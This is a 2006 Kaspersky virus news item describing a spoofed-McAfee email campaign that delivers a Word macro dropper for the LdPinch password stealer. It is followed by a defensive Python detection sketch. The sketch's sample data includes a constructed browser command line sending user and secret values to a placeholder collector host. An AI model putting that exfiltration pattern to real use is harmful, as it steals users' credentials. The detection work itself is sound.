Malicious mass mailing sent using McAfee email address

02 Nov 2006
Virus News

Kaspersky Lab has intercepted a mass mailing containing Trojan-Dropper.MSWord.Lafool.v. The mailing is unusual in that the messages appear to be sent from mcafee@europe.com and purport to originate from McAfee, an antivirus company. Kaspersky Lab believes that McAfee is in no way involved in the distribution of this Trojan and that the email address used in the messages (mcafee@europe.com) is faked in order to induce recipients to open the infected messages.

Lafool.v is a Word document called “McAfee Inc. Reports.doc”. The file is 80,635 bytes in size, and allegedly contains a report about the propagation of malicious programs on the Internet. The document contains a macro written in Visual Basic for Applications. Lafool.v extracts from itself a new modification of LdPinch, a well-known password-stealing Trojan, and launches it. LdPinch steals passwords to a number of services and applications, including AOL Instant Messenger and ICQ, as well as other confidential user data. Kaspersky Anti-Virus detects the new variant of this program as Trojan-PSW.Win32.LdPinch.bbg.

The Kaspersky Anti-Virus 6.0 and Kaspersky Internet Security Proactive Defense module will block the Trojan, including its attempts to:

  • execute a suspicious macro command
  • harvest personal data
  • start the Internet browser with command line parameters
  • send harvested data via the browser without the user’s knowledge

The Trojan’s activity is blocked if the user blocks at least one of these actions (LdPinch will either fail to start or will be unable to carry out its malicious payload). It should be noted that this technology for sending data without the user’s knowledge was first implemented in the well-publicized PC Flank Leaktest (http://www.pcflank.com/pcflankleaktest.htm).
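As an added illustration (not Kaspersky's code or product logic), the sketch below checks constructed process-creation records for the last two behaviours in the list: a browser started with a parameterised URL on its command line by a process descended from Word. The record format, process names, browser list and URLs are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

BROWSERS = {"iexplore.exe", "firefox.exe", "opera.exe"}  # assumed browser images
OFFICE = {"winword.exe"}                                 # macro host application
URL_RE = re.compile(r"https?://\S+", re.I)

# Constructed sample records: (pid, parent pid, image, command line).
# "dropped.exe" and the *.example hosts are placeholders, not real indicators.
EVENTS = [
    (100, 1, "explorer.exe", "explorer.exe"),
    (200, 100, "winword.exe", 'winword.exe "C:\\mail\\report.doc"'),
    (210, 200, "dropped.exe", "C:\\Temp\\dropped.exe"),
    (220, 210, "iexplore.exe",
     'iexplore.exe "http://collector.example/g.php?a=user&b=secret"'),
    (300, 100, "iexplore.exe", 'iexplore.exe "http://news.example/"'),
    (310, 100, "firefox.exe", 'firefox.exe "http://search.example/?q=weather"'),
]

def ancestry(pid, by_pid):
    """Return image names from pid up to the oldest known ancestor."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:  # 'seen' guards against pid loops
        seen.add(pid)
        _, ppid, image, _ = by_pid[pid]
        chain.append(image.lower())
        pid = ppid
    return chain

def suspicious_browser_launches(events):
    """Flag browsers started with URL parameters by a descendant of Word."""
    by_pid = {e[0]: e for e in events}
    hits = []
    for pid, ppid, image, cmdline in events:
        if image.lower() not in BROWSERS:
            continue
        match = URL_RE.search(cmdline)
        if not match:
            continue
        url = match.group(0).rstrip('"')
        params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
        parents = ancestry(ppid, by_pid)
        # Both conditions must hold: data on the URL and an Office ancestor.
        if params and any(p in OFFICE for p in parents):
            hits.append({"pid": pid, "url": url,
                         "params": len(params), "chain": parents})
    return hits

if __name__ == "__main__":
    for hit in suspicious_browser_launches(EVENTS):
        print(hit)
```

A browser opened by the user with a search query (pid 310) is not flagged, because no Office application appears in its ancestry.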

An antivirus database update containing detection for Lafool.v was released on October 31st, 2006. Users of Kaspersky Anti-Virus who are not using automatic updates are advised to update their antivirus databases.

For additional information, please visit Trojan-Dropper.MSWord.Lafool.v on viruslist.com.
